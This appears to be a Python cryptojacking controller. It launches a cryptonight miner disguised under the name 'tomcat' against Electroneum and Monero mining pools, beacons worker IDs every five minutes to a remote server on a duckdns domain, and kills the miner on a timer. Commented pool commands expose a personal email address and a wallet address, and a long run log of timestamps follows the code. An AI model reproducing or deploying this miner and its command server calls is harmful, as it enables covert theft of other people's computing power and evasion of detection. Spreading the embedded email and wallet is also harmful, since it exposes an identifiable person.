import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:01:05.343294
#2018-02-17 16:48:01.405673
#2018-02-17 18:36:06.431382
#2018-02-17 20:25:06.747983
#2018-02-17 22:11:05.567969
#2018-02-17 23:55:04.809565
#2018-02-18 01:46:05.135932
#2018-02-18 03:32:05.286416
#2018-02-18 05:19:07.377144
#2018-02-18 07:11:02.099381
#2018-02-18 08:59:04.368068
#2018-02-18 10:46:03.547968
#2018-02-18 12:33:05.301222
#2018-02-18 14:20:08.973798
#2018-02-18 16:11:07.517451
#2018-02-18 18:01:01.741853
#2018-02-18 19:48:05.425668
#2018-02-18 21:34:07.988362
#2018-02-18 23:22:05.797363
#2018-02-19 01:09:05.855917
#2018-02-19 02:55:02.758695
#2018-02-19 04:42:06.611000
#2018-02-19 06:26:05.174171
#2018-02-19 08:16:07.517067
#2018-02-19 10:05:09.378577
#2018-02-19 11:54:06.450935
#2018-02-19 13:41:08.564242
#2018-02-19 15:29:02.048991
#2018-02-19 17:17:08.706637
#2018-02-19 19:05:08.007471
#2018-02-19 20:50:06.455872
#2018-02-19 22:37:05.550713
#2018-02-20 00:21:06.720683
#2018-02-20 02:09:05.917530
#2018-02-20 03:59:01.905187
#2018-02-20 05:43:07.860638
#2018-02-20 07:29:06.865101
#2018-02-20 09:14:06.965236
#2018-02-20 10:56:06.789378
#2018-02-20 12:45:13.494832
#2018-02-20 14:30:09.817752
#2018-02-20 16:16:07.316090
#2018-02-20 18:03:14.480026
#2018-02-20 19:54:08.431036
#2018-02-20 21:41:01.255720
#2018-02-20 23:23:01.887793
#2018-02-21 01:08:01.463946
#2018-02-21 02:55:05.740952
#2018-02-21 04:43:05.238215
#2018-02-21 06:33:01.582585
#2018-02-21 08:18:04.456771
#2018-02-21 10:04:07.462175
#2018-02-21 11:53:14.900721
#2018-02-21 13:43:08.159790
#2018-02-21 15:27:07.219037
#2018-02-21 17:17:08.525797
#2018-02-21 19:06:04.312320
#2018-02-21 20:54:05.261495
#2018-02-21 22:42:03.090124
#2018-02-22 00:31:01.398270
#2018-02-22 02:18:08.127072
#2018-02-22 04:04:05.173905
#2018-02-22 05:50:01.375121
#2018-02-22 07:35:03.146957
#2018-02-22 09:23:08.534735
#2018-02-22 11:09:04.742189
#2018-02-22 12:55:06.834109
#2018-02-22 14:42:07.188136
#2018-02-22 16:28:07.280339
#2018-02-22 18:14:06.863250
#2018-02-22 20:06:06.299239
#2018-02-22 21:54:03.798027
#2018-02-22 23:41:04.070983
#2018-02-23 01:28:05.879707
#2018-02-23 03:14:01.892942
#2018-02-23 05:01:01.796281
#2018-02-23 06:46:07.594023
#2018-02-23 08:34:08.172803
#2018-02-23 10:48:11.638044
#2018-02-23 12:46:05.128027
#2018-02-23 14:29:07.767393
#2018-02-23 16:20:01.404283
#2018-02-23 18:06:04.344304
#2018-02-23 19:50:09.862449
#2018-02-23 21:35:07.342575
#2018-02-23 23:24:07.831529
#2018-02-24 01:17:06.554129
#2018-02-24 03:08:02.124631
#2018-02-24 04:54:05.831411
#2018-02-24 06:38:05.981241
#2018-02-24 08:27:05.589692
#2018-02-24 10:13:06.380001
#2018-02-24 12:08:06.255834
#2018-02-24 13:55:07.042528
#2018-02-24 15:47:05.174457
#2018-02-24 17:41:07.344584
#2018-02-24 19:26:01.631334
#2018-02-24 21:16:07.531452
#2018-02-25 01:16:06.471184
#2018-02-25 05:13:02.216127
#2018-02-25 10:59:01.245250